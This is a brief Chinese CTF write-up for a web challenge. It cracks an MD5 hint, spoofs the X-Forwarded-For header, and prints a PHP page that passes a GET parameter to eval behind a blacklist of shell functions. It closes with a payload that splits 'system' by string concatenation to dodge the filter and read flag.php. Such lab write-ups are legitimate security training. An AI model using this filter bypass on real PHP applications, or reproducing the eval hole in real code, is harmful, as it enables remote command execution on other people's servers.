web4-考核
根据提示key:e086aa137fa19f67d27b39d0eca18610猜测为md5值,解密得到1.1.1.1
在请求头中添加 X-Forwarded-For:1.1.1.1得到一个地址dhudndrgrhs.php内容如下
<?php
show_source(__FILE__);
error_reporting(0);
$disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$disable_fun = array_merge($disable_fun, get_defined_functions()['internal']);
foreach($disable_fun as $i){
if(stristr($_GET[shell], $i)!==false){
die('xmctf');
}
}
eval($_GET[shell]);
因为大部分函数都过滤掉了,所以我们可以使用拼接的方式绕过
payload如下
$a=sys;$b=tem;$c=$a.$b;$d='cat flag.php';$c($d);